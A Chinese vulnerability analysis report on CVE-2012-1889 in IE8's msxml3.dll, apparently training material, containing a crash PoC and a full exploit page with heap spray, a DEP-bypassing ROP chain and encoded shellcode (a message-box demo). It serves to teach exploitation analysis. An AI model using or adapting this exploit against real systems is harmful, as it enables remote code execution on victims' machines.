Internet Explorer（CVE-2012-1889）暴雷漏洞分析報告【WinXP&IE8版】

軟件名稱：Internet Explorer 軟件版本：8.0 漏洞模塊：msxml3.dll 模塊版本：8.90.1101.0 編譯日期：2008年4月14日

操作系統：Windows XP sp3 漏洞編號：CVE-2012-1889(MS12-043) 危害等級：超危 漏洞類型：緩衝區溢出 威脅類型：遠程

1. 軟件簡介
Internet Explorer，是微軟公司推出的一款網頁瀏覽器。原稱Microsoft Internet Explorer(6版本以前)和Windows Internet Explorer(7、8、9、10、11版本)，簡稱IE。在IE7以前，中文直譯爲“網絡探路者”，但在IE7以後官方便直接俗稱"IE瀏覽器"。
msxml指微軟的xml語言解析器，用來解釋xml語言的。就好像html文本下載到本地，瀏覽器會檢查html的語法，解釋html文本然後顯示出來一樣。要使用xml文件就一定要用到xml parser。

2. 漏洞成因
Microsoft XML Core Services (MSXML)是一組服務，可用JScript、VBScript、Microsoft開發工具編寫的應用構建基於XML的Windows-native應用。
Microsoft XML Core Services 處理內存中的對象的方式中存在一個遠程執行代碼漏洞。如果用戶查看包含特製內容的網站，則該漏洞可能允許遠程執行代碼。Microsoft XML Core Services 3.0、4.0、5.0和6.0版本中存在漏洞，該漏洞源於訪問未初始化內存位置。

3. 利用過程
遠程攻擊者可利用該漏洞藉助特製的web站點，執行任意代碼或導致拒絕服務（內存破壞）。

4. PoC
使用以下代碼保存爲html文件，在windbg條件下打開IE瀏覽器，並運行這個html文件，IE瀏覽器崩潰。

示例代碼：

<html>
<head>
    <title>CVE 2012-1889 PoC v2 By:15PB.Com</title>
</head>
<body>
    <object classid="clsid:f6D90f11-9c73-11d3-b32e-00C04f990bb4" id='15PB'></object>
    <script>
	    // 獲取名爲15PB的對象，並將其保存到名爲obj15PB實例中
        var obj15PB = document.getElementById('15PB').object;
		// 初始化數據變量srcImgPath的內容（unescape()是解碼函數）
        var srcImgPath = unescape("\u0C0C\u0C0C");
		// 構建一個長度爲0x1000[4096*2]字節的數據
        while (srcImgPath.length < 0x1000)
            srcImgPath += srcImgPath;
		// 構建一個長度爲0x1000-10[4088*2]的數據，起始內容爲“\\15PB_Com”
        srcImgPath = "\\\\15PB_Com" + srcImgPath;
        srcImgPath = srcImgPath.substr(0, 0x1000-10);
        // 創建一個圖片元素，並將圖片源路徑設爲srcImgPath
        var emtPic = document.createElement("img");
        emtPic.src = srcImgPath;
        emtPic.nameProp;       // 返回當前圖片文件名（載入路徑）
        obj15PB.definition(0); // 定義對象（觸發溢出）
    </script>
</body>
</html>

點擊是

5.Exploit

<html><head> <title>Step2_Accurate_Heap Spray By:15PB.Com</title></head>
<body><object classid="clsid:f6D90f11-9c73-11d3-b32e-00C04f990bb4" id='15PB'></object>
    <script>
// 1.  生成Padding
	   var cPadding = unescape("\u0C0C\u0C0C");
        	   while (cPadding.length < 0x1000)
            		cPadding += cPadding;
        	   cPadding = cPadding.substring(0, 0x5F6);
// 2.  製作Ret2Libc
	 var cRet2Libc = unescape( 
		     "\u5ed6\u77be" + //0c0c0c0c  //ret	Addr
		     "\u362c\u77bf" + //0c0c0c10   //pop ebx Addr
           	  	     "\u5ed5\u77be" + //0c0c0c14  //xchg eax,esp # ret Addr
          	  	     "\u5ed6\u77be" + //0c0c0c18  //ret	Addr
          	  	     "\u5ed6\u77be" + //0c0c0c1c  //ret	Addr
         		     "\u5ed6\u77be" + //0c0c0c20  //ret	Addr
           	 	     "\u5ed6\u77be" + //0c0c0c24  //ret	Addr
           	   	     "\u1AD4\u7C80" + //0c0c0c28  //VirtualProtect Addr
         	    	     "\u0c40\u0c0c" + //0c0c0c2c   //ret to Payload
		     "\u0c40\u0c0c" + //0c0c0c30  //lpAddress
        	  	     "\u1000\u0000" + //0c0c0c34  //dwSize
		     "\u0040\u0000" + //0c0c0c38  //flNewProtect
         	    	     "\uFFFC\u77C2"   //0c0c0c3c  //lpflOldProtect
		     ); 

// 3.  準備好Payload（unescape()是解碼函數）
        var cPayload = unescape(
        "\u8360\u20EC\u4CEB\u6547\u5074\u6F72\u4163\u6464" +
        "\u6572\u7373\u6F4C\u6461\u694C\u7262\u7261\u4579" +
        "\u4178\u5500\u6573\u3372\u2E32\u6C64\u006C\u654D" +
        "\u7373\u6761\u4265\u786F\u0041\u7845\u7469\u7250" +
        "\u636F\u7365\u0073\u6548\u6C6C\u206F\u3531\u4250" +
        "\u0021\u00E8\u0000\u5B00\u8B64\u3035\u0000\u8B00" +
        "\u0C76\u768B\u8B1C\u8B36\u0856\u5253\u12E8\u0000" +
        "\u8B00\u8DF0\uBD4B\u5251\uD0FF\u5653\u5250\u6EE8" +
        "\u0000\u5500\uEC8B\uEC83\u520C\u558B\u8B08\u3C72" +
        "\u348D\u8B32\u7876\u348D\u8B32\u1C7E\u3C8D\u893A" +
        "\uFC7D\u7E8B\u8D20\u3A3C\u7D89\u8BF8\u247E\u3C8D" +
        "\u893A\uF47D\uC033\u01EB\u8B40\uF875\u348B\u8B86" +
        "\u0855\u348D\u8B32\u0C5D\u7B8D\uB9AF\u000E\u0000" +
        "\uF3FC\u75A6\u8BE3\uF475\uFF33\u8B66\u463C\u558B" +
        "\u8BFC\uBA34\u558B\u8D08\u3204\u8B5A\u5DE5\u08C2" +
        "\u5500\uEC8B\uEC83\u8B08\u145D\u4B8D\u6ACC\u6A00" +
        "\u5100\u55FF\u8D0C\uD74B\u5051\u55FF\u8910\uFC45" +
        "\u4B8D\u51E3\u75FF\uFF08\u1055\u4589\u8DF8\uEF4B" +
        "\u006A\u5151\u006A\u55FF\u6AFC\uFF00\uF855\uE58B" +
        "\uC25D\u0010\u0000");
       
// 4.  準備好FillData
        // 4.1 計算填充滑板指令數據的大小（都除2是因爲length返回的是Unicode的字符個數）
        var nSlideSize = 0x1000;           // 一個滑板指令塊的大小（4KB）
        var nPadSize   = cPadding.length;  // Padding大小
		var nR2LSize   = cRet2Libc.length; // Ret2Libc大小
        var nPySize    = cPayload.length;  // Shellcode大小
        var nFillSize  = nSlideSize-nPadSize-nR2LSize-nPySize;
        // 4.2 製作好一塊填充數據
        var cFillData  = unescape("\u0C0C\u0C0C");
        while (cFillData.length < nSlideSize)
            cFillData += cFillData;
        cFillData = cFillData.substring(0, nFillSize);
// 5.  構建滑板指令數據塊
        var nBlockSize = 0x40000;  // 256KB
        var cBlock     = cPadding + cRet2Libc + cPayload + cFillData;
        while (cBlock.length < nBlockSize)
            cBlock += cBlock;
        cBlock = cBlock.substring(2, nBlockSize-0x21);
      
  // 6.  填充200MB的內存區域（申請800塊256KB大小的滑板數據區），試圖覆蓋0x0C0C0C0C
        //     區域，每塊滑板數據均由 滑板數據+Shellcode 組成，這樣只要任意一塊滑板數據
        //     正好落在0x0C0C0C0C處，大量無用的“OR AL,0C”就會將執行流程引到滑板數據區
        //     後面的Shellcode處，進而執行Shellcode。
        var cSlideData = new Array();
        for (var i = 0; i < 800; i++)
            cSlideData[i] = cBlock.substr(0, cBlock.length);
// 7.  觸發CVE 2012-1889漏洞
        // 7.1 獲取名爲15PB的XML對象，並將其保存到名爲obj15PB實例中
        var obj15PB = document.getElementById('15PB').object;
        // 7.2 構建一個長度爲0x1000-10=8182，起始內容爲“\\15PB_Com”字節的數據
        var srcImgPath = unescape("\u0C0C\u0C08");
        while (srcImgPath.length < 0x1000)
            srcImgPath += srcImgPath;
        srcImgPath = "\\\\15PB_Com" + srcImgPath;
        srcImgPath = srcImgPath.substr(0, 0x1000-10);
        // 7.3 創建一個圖片元素，並將圖片源路徑設爲srcImgPath，並返回當前圖片文件名
        var emtPic = document.createElement("img");
        emtPic.src = srcImgPath;
        emtPic.nameProp;
        // 7.4 定義對象obj15PB（觸發溢出）
        obj15PB.definition(0);
    </script></body></html>

6.利用原理

執行Exploit網頁後在msxml3.dll中有以下彙編代碼:

mov eax,[ebp-14h]     //eax=0c0c0c08h
……
mov esi,eax           //esi=0c0c0c08h
……
mov ecx,[eax]	      //ecx=[0x0c0c0c08] => 0c0c0c0ch
……
call [ecx+18h] 	      //call [0x0c0c0c24]
……
mov eax,[esi]	      //eax=[0x0c0c0c08] => 0c0c0c0ch
……
call [eax+8h]	      //call [0x0c0c0c14]

那麼根據之前的彙編代碼,構建以下Ret2libC:

0x0c0c0c04    0c0c0c0ch
0x0c0c0c08    0c0c0c0ch
0x0c0c0c0C    0c0c0c0ch
0x0c0c0c10    retn Addr                    <-esp  Step_3
0x0c0c0c14    pop exx # retn Addr                 Step_4(直接執行下下一步)
0x0c0c0c18    xchg eax,esp # retn Addr            Step_2(關鍵步驟)
0x0c0c0c1C    retn Addr                           Step_5
0x0c0c0c20    retn Addr        	                  Step_6
0x0c0c0c24    retn Addr 	            	      Step_1 / Step_7
0x0c0c0c28    VirtualProtect Addr	              Step_8
0x0c0c0c2C    retn to PayLoad                     (0x0c0c0c40)
0x0c0c0c30    lpAddress                           (這裏寫PayLoad地址0x0c0c0c40)
0x0c0c0c34    dwSize                              (0x1000夠了)	
0x0c0c0c38    flNewProtect	                      (0x40 可執行可寫可讀)	
0x0c0c0c38    flOldProtect	         	          (找一個可以寫入的地址就行)	
往下面就是PayLoad……

7.結語
觸發漏洞的代碼是JavaScript中最後一句，即後面obj15PB.definition(0)。definition是DOM對象的一個屬性，而且是隻讀的屬性，不可以把屬性當作函數來使用並往裏面傳遞參數。

繞過DEP的關鍵原理就是RETN,在內存中找到你想要執行的代碼,佈局Ret2LibC,最後構建VirtualProtect,讓PayLoad代碼段可執行.